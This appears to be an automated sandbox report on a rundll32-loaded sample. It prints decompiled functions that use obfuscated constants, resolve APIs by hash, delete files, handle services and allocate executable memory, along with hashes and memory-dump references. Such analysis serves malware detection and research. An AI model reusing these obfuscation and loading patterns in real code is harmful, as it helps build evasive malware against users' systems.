                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
                                                                      • Instruction ID: fa4b12668ec6d21353080ad86ccdc36e6c74fcaf49b463c0be74cae6c4805b30
                                                                      • Opcode Fuzzy Hash: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
                                                                      • Instruction Fuzzy Hash: 482118B5E00208FBDB04CFA5C94A5EEBBB1EB41304F10C099E518AB291D7B96B549B50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003741CA, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 58%
                                                                      			E003741CA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t42;
				intOrPtr* _t50;
				void* _t51;
				signed int _t53;
				void* _t57;

				_t57 = __ecx;
				E00372550(_t42);
				_v20 = 0x33dd;
				_t53 = 0x60;
				_v20 = _v20 / _t53;
				_v20 = _v20 ^ 0x0000445b;
				_v8 = 0x98b2;
				_v8 = _v8 << 0xa;
				_v8 = _v8 | 0x9f0dae98;
				_v8 = _v8 + 0xffff2dd8;
				_v8 = _v8 ^ 0x9f6f2800;
				_v16 = 0x7a4d;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x630ec107;
				_v16 = _v16 ^ 0x6301fd0c;
				_v12 = 0xd3a1;
				_v12 = _v12 ^ 0x9b5a4994;
				_v12 = _v12 + 0xffffbec0;
				_v12 = _v12 ^ 0x9b5a0da8;
				_t50 = E00367378(_t53, 0x7c314b7f, _t53, 0x90f109b3, 0x1d9);
				_t51 =  *_t50(_t57, 0, _a12, 0x28, __ecx, __edx, _a4, _a8, _a12, 0, _a20, 0x28); // executed
				return _t51;
			}












                                                                      0x003741d6
                                                                      0x003741e5
                                                                      0x003741ea
                                                                      0x003741fb
                                                                      0x00374203
                                                                      0x00374206
                                                                      0x0037420d
                                                                      0x00374214
                                                                      0x00374218
                                                                      0x0037421f
                                                                      0x00374226
                                                                      0x0037422d
                                                                      0x00374234
                                                                      0x00374238
                                                                      0x0037423f
                                                                      0x00374246
                                                                      0x0037424d
                                                                      0x00374254
                                                                      0x0037425b
                                                                      0x0037427a
                                                                      0x0037428a
                                                                      0x00374290

                                                                      APIs
                                                                      • SetFileInformationByHandle.KERNELBASE(0026A181,00000000,0000445B,00000028), ref: 0037428A
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileHandleInformation
                                                                      • String ID:
                                                                      • API String ID: 3935143524-0
                                                                      • Opcode ID: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
                                                                      • Instruction ID: 5956e9fd12d3565c8b6595b7ab99ba736f1b4f546748380c20ff77c99a94e207
                                                                      • Opcode Fuzzy Hash: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
                                                                      • Instruction Fuzzy Hash: E0115E71D00308BFEB15DFE4CC4AAEEBBB5EF44710F108088E9246A291D7B55B109F80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00365AB8, Relevance: 1.6, APIs: 1, Instructions: 51serviceCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 86%
                                                                      			E00365AB8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				int _t57;
				signed int _t59;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00372550(_t47);
				_v20 = 0xc8c;
				_v20 = _v20 + 0xffffaa04;
				_v20 = _v20 ^ 0xb702763d;
				_v20 = _v20 ^ 0x48fdd1a6;
				_v16 = 0xeb1c;
				_v16 = _v16 << 4;
				_t59 = 0xf;
				_v16 = _v16 * 0xe;
				_v16 = _v16 + 0xffff64c4;
				_v16 = _v16 ^ 0x00cd6bec;
				_v12 = 0x757;
				_v12 = _v12 ^ 0x4183b2e4;
				_v12 = _v12 << 2;
				_v12 = _v12 / _t59;
				_v12 = _v12 ^ 0x0067440e;
				_v8 = 0xa082;
				_v8 = _v8 >> 1;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0xcec43627;
				_v8 = _v8 ^ 0xcec45939;
				E00367378(_t59, 0x114af6f7, _t59, 0x2daf77dd, 0x11f);
				_t57 = CloseServiceHandle(_a12); // executed
				return _t57;
			}










                                                                      0x00365abe
                                                                      0x00365ac1
                                                                      0x00365ac4
                                                                      0x00365ac9
                                                                      0x00365ace
                                                                      0x00365ad8
                                                                      0x00365ae1
                                                                      0x00365ae8
                                                                      0x00365aef
                                                                      0x00365af6
                                                                      0x00365b00
                                                                      0x00365b0b
                                                                      0x00365b0e
                                                                      0x00365b15
                                                                      0x00365b1c
                                                                      0x00365b23
                                                                      0x00365b2a
                                                                      0x00365b34
                                                                      0x00365b37
                                                                      0x00365b3e
                                                                      0x00365b45
                                                                      0x00365b48
                                                                      0x00365b4c
                                                                      0x00365b53
                                                                      0x00365b6c
                                                                      0x00365b77
                                                                      0x00365b7c

                                                                      APIs
                                                                      • CloseServiceHandle.SECHOST(48FDD1A6), ref: 00365B77
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandleService
                                                                      • String ID:
                                                                      • API String ID: 1725840886-0
                                                                      • Opcode ID: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
                                                                      • Instruction ID: c22610fc99d1190bab5217965dffddb57928a4adb0ff94024d36376845dbbf81
                                                                      • Opcode Fuzzy Hash: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
                                                                      • Instruction Fuzzy Hash: 28110371D0020DFFDB08DFA9C94A8EEBBB0FB40304F508599E525A6291D7B99B15DF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0036E554, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 90%
                                                                      			E0036E554(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t42;
				int _t51;
				signed int _t53;
				struct _SHFILEOPSTRUCTW* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E00372550(_t42);
				_v20 = 0xead4;
				_v20 = _v20 + 0xffff9be4;
				_v20 = _v20 ^ 0x000085bc;
				_v16 = 0x46f7;
				_v16 = _v16 << 0xe;
				_v16 = _v16 << 7;
				_t53 = 0x39;
				_v16 = _v16 / _t53;
				_v16 = _v16 ^ 0x03e8aab4;
				_v12 = 0x2beb;
				_v12 = _v12 ^ 0xafae01c3;
				_v12 = _v12 + 0xffff58eb;
				_v12 = _v12 ^ 0xa5118136;
				_v12 = _v12 ^ 0x0abc415f;
				_v8 = 0xa691;
				_v8 = _v8 ^ 0x7591c523;
				_v8 = _v8 << 0xa;
				_v8 = _v8 + 0x20df;
				_v8 = _v8 ^ 0x458ea297;
				E00367378(_t53, 0x11ef7293, _t53, 0xd20b8aa4, 0x23a);
				_t51 = SHFileOperationW(_t57); // executed
				return _t51;
			}











                                                                      0x0036e55b
                                                                      0x0036e55e
                                                                      0x0036e560
                                                                      0x0036e562
                                                                      0x0036e567
                                                                      0x0036e571
                                                                      0x0036e57a
                                                                      0x0036e581
                                                                      0x0036e588
                                                                      0x0036e58c
                                                                      0x0036e595
                                                                      0x0036e59d
                                                                      0x0036e5a0
                                                                      0x0036e5a7
                                                                      0x0036e5ae
                                                                      0x0036e5b5
                                                                      0x0036e5bc
                                                                      0x0036e5c3
                                                                      0x0036e5ca
                                                                      0x0036e5d1
                                                                      0x0036e5d8
                                                                      0x0036e5dc
                                                                      0x0036e5e3
                                                                      0x0036e602
                                                                      0x0036e60b
                                                                      0x0036e611

                                                                      APIs
                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?,?,?,?), ref: 0036E60B
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileOperation
                                                                      • String ID:
                                                                      • API String ID: 3080627654-0
                                                                      • Opcode ID: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
                                                                      • Instruction ID: 37c16b350633fe484ff561c77a503795dee2fce76da759ef270c5068000918ff
                                                                      • Opcode Fuzzy Hash: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
                                                                      • Instruction Fuzzy Hash: 821123B1D01318BBEB18DFA5C84A8DEBBB4FB01718F10C598E82576241E3B95B44DF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0036EB1E, Relevance: 1.5, APIs: 1, Instructions: 43fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 82%
                                                                      			E0036EB1E(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t34;
				int _t44;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00372550(_t34);
				_v8 = 0xd1b2;
				_v8 = _v8 * 0x63;
				_v8 = _v8 << 4;
				_v8 = _v8 * 0x74;
				_v8 = _v8 ^ 0x4bec8e88;
				_v20 = 0x1fc5;
				_v20 = _v20 + 0x9c84;
				_v20 = _v20 ^ 0x0000b099;
				_v16 = 0x542c;
				_v16 = _v16 | 0x3ba7d0a3;
				_v16 = _v16 ^ 0x3ba7e6ce;
				_v12 = 0x8319;
				_v12 = _v12 * 0x45;
				_v12 = _v12 + 0xffff39a4;
				_v12 = _v12 ^ 0x0022b84c;
				E00367378(__ecx, 0x497c0ce2, __ecx, 0x90f109b3, 0x28d);
				_t44 = DeleteFileW(_a8); // executed
				return _t44;
			}









                                                                      0x0036eb24
                                                                      0x0036eb27
                                                                      0x0036eb2b
                                                                      0x0036eb2c
                                                                      0x0036eb31
                                                                      0x0036eb49
                                                                      0x0036eb4c
                                                                      0x0036eb5b
                                                                      0x0036eb5e
                                                                      0x0036eb65
                                                                      0x0036eb6c
                                                                      0x0036eb73
                                                                      0x0036eb7a
                                                                      0x0036eb81
                                                                      0x0036eb88
                                                                      0x0036eb8f
                                                                      0x0036eb9a
                                                                      0x0036eb9d
                                                                      0x0036eba4
                                                                      0x0036ebb7
                                                                      0x0036ebc2
                                                                      0x0036ebc7

                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(3BA7E6CE), ref: 0036EBC2
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
                                                                      • Instruction ID: 4486d7639447a4f67ca5764f3b9804def74a30e2b5a83d628e4e1fae2c67f08d
                                                                      • Opcode Fuzzy Hash: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
                                                                      • Instruction Fuzzy Hash: 5B11E3B1C0020DFBDF04DFE4DA4689EBBB4FB40314F60C589E814AA2A1D7749B549F90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0036F1ED, Relevance: 1.3, APIs: 1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 85%
                                                                      			E0036F1ED(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t46;
				int _t57;
				signed int _t59;
				signed int _t60;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00372550(_t46);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x28beb0;
				_v16 = 0xe97b;
				_v16 = _v16 >> 3;
				_t59 = 0x47;
				_v16 = _v16 / _t59;
				_v16 = _v16 ^ 0x00001a39;
				_v12 = 0x2d01;
				_v12 = _v12 >> 8;
				_t60 = 0x3a;
				_v12 = _v12 / _t60;
				_v12 = _v12 ^ 0x000023d3;
				_v20 = 0xc5d9;
				_v20 = _v20 | 0x3e7a6da8;
				_v20 = _v20 ^ 0x3e7ad9f3;
				_v8 = 0x3ddd;
				_v8 = _v8 >> 7;
				_v8 = _v8 + 0xffffadd9;
				_v8 = _v8 ^ 0xffff8e91;
				E00367378(_t60, 0x171b6692, _t60, 0x90f109b3, 0x219);
				_t57 = CloseHandle(_a12); // executed
				return _t57;
			}













                                                                      0x0036f1f3
                                                                      0x0036f1f6
                                                                      0x0036f1f9
                                                                      0x0036f1fe
                                                                      0x0036f203
                                                                      0x0036f20a
                                                                      0x0036f213
                                                                      0x0036f21a
                                                                      0x0036f223
                                                                      0x0036f228
                                                                      0x0036f22d
                                                                      0x0036f234
                                                                      0x0036f23b
                                                                      0x0036f242
                                                                      0x0036f24a
                                                                      0x0036f24d
                                                                      0x0036f254
                                                                      0x0036f25b
                                                                      0x0036f262
                                                                      0x0036f269
                                                                      0x0036f270
                                                                      0x0036f274
                                                                      0x0036f27b
                                                                      0x0036f29a
                                                                      0x0036f2a5
                                                                      0x0036f2aa

                                                                      APIs
                                                                      • CloseHandle.KERNEL32(3E7AD9F3), ref: 0036F2A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
                                                                      • Instruction ID: c3ef44ec563041582890030ef0f4c325384d348d1014864b96a0c09584b47509
                                                                      • Opcode Fuzzy Hash: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
                                                                      • Instruction Fuzzy Hash: 3C1114B6D0020CEBDF05CFE5C80A9DEBBB5EB14308F10C589E914AA290D3B59B649F80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 00388330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMonitorInfoA.USER32(?,?), ref: 00388361
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0038839D
                                                                      • GetSystemMetrics.USER32(00000001), ref: 003883A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$InfoMonitor
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfo
                                                                      • API String ID: 4250584380-1428758730
                                                                      • Opcode ID: d28cd9aed57ea9c45d1823d3c69cad849b607cb82e83fc281fd2631f59e8d42d
                                                                      • Instruction ID: b9d5dc2cc537aeb595dfa58a2f7b17309ac1b175c473482a7c005aa478bd3986
                                                                      • Opcode Fuzzy Hash: d28cd9aed57ea9c45d1823d3c69cad849b607cb82e83fc281fd2631f59e8d42d
                                                                      • Instruction Fuzzy Hash: 0C11BE79601705AFD722AF649C45BABB7ECEF49B14F404569ED46DB240DBF0B8048BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003885AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 003885E5
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0038860A
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00388615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$DisplayEnumMonitors
                                                                      • String ID: /}Au$EnumDisplayMonitors
                                                                      • API String ID: 1389147845-1105134141
                                                                      • Opcode ID: 9eeae7699befa46b0cc6a04f87642009484f0e6592815932c7d5cc9a5e4f6eb3
                                                                      • Instruction ID: bed6c0242929587e12559e07d23379a0c60ff481c257b6a509ac5695922696fe
                                                                      • Opcode Fuzzy Hash: 9eeae7699befa46b0cc6a04f87642009484f0e6592815932c7d5cc9a5e4f6eb3
                                                                      • Instruction Fuzzy Hash: 40311EB2A01209AFDB12EFA4CC45EEF77BCAF45300F514566FA15D7200EB34E9008BA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00388404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00388471
                                                                      • GetSystemMetrics.USER32(00000001), ref: 0038847C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoA
                                                                      • API String ID: 4116985748-2822609925
                                                                      • Opcode ID: 211bb749113e46851851033a82ce3c16d8919346a3b43fdcafc70e5c587ebddb
                                                                      • Instruction ID: 8c2a15cc65f73c9e033e43e1618cd35d2a96a369d2e758175bf1f76ab7dece53
                                                                      • Opcode Fuzzy Hash: 211bb749113e46851851033a82ce3c16d8919346a3b43fdcafc70e5c587ebddb
                                                                      • Instruction Fuzzy Hash: 4B1122326017069FD722EF62DC46BA7B7ECEF09320F904469ED55CB281DB71B8408BA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003884D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00388545
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00388550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoW
                                                                      • API String ID: 4116985748-1558784340
                                                                      • Opcode ID: 6ac9b47c2b1e77ee1d37078e2a2bd194027e5c719be7b5b17dbc007d5b4a1985
                                                                      • Instruction ID: df3c399169a3c68558dc32f2e6512579fc804c63d69764ff03aec6c4ac0c1942
                                                                      • Opcode Fuzzy Hash: 6ac9b47c2b1e77ee1d37078e2a2bd194027e5c719be7b5b17dbc007d5b4a1985
                                                                      • Instruction Fuzzy Hash: 6E112271A517089FD722EF608C46BA7B7ECEF0A310F44496AED05CB240DBB1B804CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00388298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 003882E6
                                                                      • GetSystemMetrics.USER32(00000001), ref: 003882F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromPoint
                                                                      • API String ID: 4116985748-3670600901
                                                                      • Opcode ID: 524dd97cb9fff9841bb89cea9e099352b8d63a48daeb77d98b30a2143e42115d
                                                                      • Instruction ID: 55335f1eff62a7b6ea1f9c8d85e18403f193323e7b84f182472403011aa98e1b
                                                                      • Opcode Fuzzy Hash: 524dd97cb9fff9841bb89cea9e099352b8d63a48daeb77d98b30a2143e42115d
                                                                      • Instruction Fuzzy Hash: C501F43D201308AFDB126F50DC45F9E7B99FB44B50F844065F984CB211CBB1BC008BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00388170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 003881C1
                                                                      • GetSystemMetrics.USER32(00000001), ref: 003881CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromRect
                                                                      • API String ID: 4116985748-120404372
                                                                      • Opcode ID: 5c824fc1a297a8825bfeb034bf0ea84ec9f7a9700016d102787e0963ecd90669
                                                                      • Instruction ID: 52be576ff56db0b63b84d159e3e709410122556cb7d3f6b8b41079a71b5e9c5d
                                                                      • Opcode Fuzzy Hash: 5c824fc1a297a8825bfeb034bf0ea84ec9f7a9700016d102787e0963ecd90669
                                                                      • Instruction Fuzzy Hash: B60181312003159BD722AB14DC8AF57B79DEB40799F9580A2ED04CB203CF71EC428BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003C2B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DdeCreateStringHandleA.USER32(00000015,00000000), ref: 003C2B7C
                                                                      • DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 003C2BA9
                                                                      • DdeGetLastError.USER32(00000015), ref: 003C2BBB
                                                                      • DdeFreeStringHandle.USER32(00000015,?), ref: 003C2BCD
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$ClientCreateErrorFreeLastTransaction
                                                                      • String ID:
                                                                      • API String ID: 2421758087-0
                                                                      • Opcode ID: 2e180e9d3ade54670169f7a24d40a8c152579fed7c84bca98cd128507c2cc4b3
                                                                      • Instruction ID: 4e4e58555d3558bbec8170b0cde5ece3838b37e07ea24a1acafeaff4853d9fba
                                                                      • Opcode Fuzzy Hash: 2e180e9d3ade54670169f7a24d40a8c152579fed7c84bca98cd128507c2cc4b3
                                                                      • Instruction Fuzzy Hash: 1D21F975204240DFDB46DF68C8C1F6AB7E8AB49310F158199F998CF2A6D771EC40CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003C1428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DdeQueryConvInfo.USER32(?,?,00000060), ref: 003C14BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ConvInfoQuery
                                                                      • String ID: 0<$`
                                                                      • API String ID: 701148680-2576692213
                                                                      • Opcode ID: 23fd684d3383a714ca76b21fd09e84a790c19668e97b4c67217e5e4e672341b1
                                                                      • Instruction ID: e7f0c6b4a0ce94ca8c271489672c4b9b7645655afb69b50693858466a23db77d
                                                                      • Opcode Fuzzy Hash: 23fd684d3383a714ca76b21fd09e84a790c19668e97b4c67217e5e4e672341b1
                                                                      • Instruction Fuzzy Hash: 30518B76B002198BCB16DE6CD985EAE73F9EB4A350F154028FD05D7746CA34ED11D7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003880E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(?), ref: 00388110
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$GetSystemMetrics
                                                                      • API String ID: 4116985748-3773086709
                                                                      • Opcode ID: d29f205c81a2cb3518e49a9076dc74cee6d3fe4435e9ce747cf4f932b3967696
                                                                      • Instruction ID: 0c03d45b4d751cf049c652a47bfe61f53065b819b2ac35688fd1dfbc67cd5239
                                                                      • Opcode Fuzzy Hash: d29f205c81a2cb3518e49a9076dc74cee6d3fe4435e9ce747cf4f932b3967696
                                                                      • Instruction Fuzzy Hash: B0F0B4302253415ADB137B34DDCEA22354FAB82330FE08BB1E1258A6D5CE3999428359
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: rundll32.exe PID: 2260 Parent PID: 3040 rundll32.exeCOMMON

                                                                      Executed Functions

                                                                      Function 003D3928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136filememoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 46 3d3928-3d39b4 call 3b79dc 51 3d39bd-3d39cf GetEnhMetaFileA 46->51 52 3d39b6 46->52 54 3d39d8-3d39ec 51->54 55 3d39d1 51->55 52->51 56 3d3a0e-3d3ac5 VirtualAlloc 54->56 57 3d39ee-3d3a0c 54->57 55->54 65 3d3acf-3d3ada 56->65 57->56 66 3d3adc-3d3b1f 65->66 67 3d3b21-3d3b33 65->67 66->65 68 3d3b75-3d3bac 67->68 69 3d3b35-3d3b73 67->69 69->68 69->69
                                                                      APIs
                                                                      • GetEnhMetaFileA.GDI32(trty55345), ref: 003D39C2
                                                                      • VirtualAlloc.KERNELBASE(00000000,003D6CB4,00001000,00000040), ref: 003D3A8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileMetaVirtual
                                                                      • String ID: trty55345$|l=
                                                                      • API String ID: 2643768156-3697153081
                                                                      • Opcode ID: 41114418611ba0ffa1c4070e4cc754ec6857df54afbf950ad9b71aa96dd5cc96
                                                                      • Instruction ID: 56b183d423b761421adc479f5d8e064c3359fb159d262e8f46aa8be55856636e
